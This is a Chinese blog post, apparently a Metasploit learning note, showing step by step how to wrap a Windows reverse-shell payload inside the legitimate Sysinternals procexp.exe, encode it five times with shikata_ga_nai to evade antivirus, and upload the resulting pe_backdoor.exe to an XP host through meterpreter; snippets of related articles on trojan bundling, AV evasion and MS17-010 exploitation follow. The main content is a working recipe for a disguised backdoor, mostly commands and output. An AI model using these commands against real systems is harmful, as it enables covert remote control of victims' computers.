metasploit自定义可执行文件模板

最新推荐文章于 2024-07-18 10:29:55 发布
最新推荐文章于 2024-07-18 10:29:55 发布
阅读量2.3k 收藏
点赞数
分类专栏: metasploit backtrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8868194
版权

在网上下载Sysinternals,解压,得到procexp.exe,把它传到BT5上去,然后生成pe_backdoor.exe

root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m40.713s
user    0m24.734s
sys     0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage  documentation  HACKING  msfbinscan  msfd        msfgui       msfpescan  msfrpcd    pe_backdoor.exe  scripts  THIRD-PARTY.md
COPYING   external       lib      msfcli      msfelfscan  msfmachscan  msfrop     msfupdate  plugins          spec     tools
data      Gemfile        modules  msfconsole  msfencode   msfpayload   msfrpc     msfvenom   README.md        test     work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe 
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/

上传到XP: 

meterpreter > upload pe_backdoor.exe
[*] uploading  : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded   : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >

杀毒软件报告威胁,文件名改为hello.exe,也报告威胁。

feier7501
关注
专栏目录
metasploit 初学(一)
小山岷的专栏
11-24 2万+
每个人都有死穴,在武侠片中经常可以看到,点到某人死穴,轻者此人被控、武功被废,重则当场瘫痪或毙命。可以参考武侠片各种大侠。 对于系统而言,存在有或多或少的漏洞,而这些漏洞则很容易被攻击者利用,并成功渗透入主机。 只有了解如何渗透,才能进行反渗透。 metasploit是渗透测试很流行的工具,最近开始记录学习metasploit的过程: 一 安装: 1 对于64位系统: wget h
Metasploit
m0_57379855的博客
03-30 3318
Metasploitmetasploit下载ubuntu安装msfubuntu下载Kali开启msfKali下载Kali添加root用户打开msfKali更新msfViper炫彩蛇Kali安装viperMetasploit目录结构Metasploit模块auxiliaryexploitspayloadspostencodersevasionnopsmsfvenom常用参数-l-p-f-e-a-o-b-n-s-i-c-x-k-v各平台生成payload命令WindowsMacAndroidPowershell
css-template
05-31
很好的一个例子,大家在学习JS的时候可以好好的学习学习,希望看了有一定的提高
免杀处理---自定义可执行文件模板
Solar's Blog
04-30 670
自定义可执行文件模板通常情况下,但我们运行msfvenom命令时,攻击载荷被嵌入到可执行文件模板中,默认文件位于/data/templates/template.exe.虽然这个模板会时常更新,但它永远是杀毒软件厂商在创建病毒库时的重点关注对象。实际上,当前版本的msfvenom支持使用-x选项使用任意的Windows可执行程序来代替默认模板文件。因此,我们可以重新对攻击载荷进行编码,并将微软sy...
Metasploit 完全指南(三)
最新发布
龙哥盟
07-18 1036
在本章中,我们首先介绍了在 Metasploit 中编写利用程序的汇编基础知识,一般概念以及它们在利用中的重要性。我们深入讨论了基于堆栈的溢出、基于 SEH 的堆栈溢出以及绕过 DEP 等保护机制的细节。我们还介绍了 Metasploit 中各种方便的工具,以帮助利用过程。我们还看了坏字符和空间限制的重要性。现在,我们可以借助支持工具执行诸如在 Metasploit 中编写软件的利用之类的任务,确定必要的寄存器,覆盖它们的方法,并打败复杂的保护机制。
Kali MSF命令模块最详细模块与利用解释整合
Sunspot
04-19 1898
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
metasploit的安装--winows环境
最小公倍数的博客
10-25 8528
1、下载适用于win的.exe文件,双击即可安装; 下载地址:http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe 2、安装步骤 (1)双击.exe文件,进入安装; (2)勾选同意协议; (3)选择安装路径,我是选择在D盘,C盘东西太多; (4)接着出现下面...
Metasploit深入解析:编写自定义漏洞模块
它集成了数百种不同的渗透测试工具、漏洞数据库和丰富的社区资源,使得安全专业人员可以利用这些工具来执行各种安全测试任务。 ### 1.2 Metasploit框架和架构 Metasploit框架采用模块化的设计,包括了丰富的漏洞...
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5304
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
Web渗透测试实战:基于Metasploit 5.0
华章IT官方博客
03-28 4114
在当今快速发展的技术世界中,信息安全行业正以惊人的速度变化,与此同时,针对组织的网络攻击数量也在迅速增加。为了保护自己免受这些来自真实世界的攻击,许多组织在其流程管理中引入了安全审计以及风险和漏洞评估机制,旨在评估与其业务资产有关的风险。为了保护IT资产,许多组织聘请信息安全专业人员,以识别组织的应用程序和网络中可能存在的风险、漏洞和威胁。对于信息安全专业人员来说,掌握并...
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
例如,`windows/adduser` payload可以创建一个新的用户,配合自定义可执行文件实现特定功能。 总的来说,理解如何在Metasploit中配置自定义payload并结合exploit模块进行攻击是网络安全专业人士必备的技能。这...
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
metasploit下载地址
yiyefangzhou24的专栏
10-16 1万+
Windows 64bithttp://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe Windows 32bithttp://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe...
利用MS17-010渗透win7(32位
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
热门推荐
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
Metasploit运行环境内存不要低于2GB
weixin_33885253的博客
04-12 176
2019独角兽企业重金招聘Python工程师标准>>> ...
渗透之——Metasploit制作并运行自定义Meterpreper脚本
冰河的专栏
01-15 2244
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86494361 注意:运行此脚本的前提是我们已经经过一系列的渗透,成功拿下了Meterpreter命令行。 这个脚本将会检查我们当前用户是否为管理员用户,然后找到explorer.exe进程,并自动迁移到这个进程中。 具体脚本mymet.rb如下: ## # Author...
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
如何在metasploit用php上传文件
05-05
Metasploit中,可以使用以下命令来上传文件: 1. 打开msfconsole并启动一个后门会话。 2. 使用以下命令将文件上传到目标计算机: ``` upload /path/to/local/file.ext /path/to/remote/directory/ ``` 3. 如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值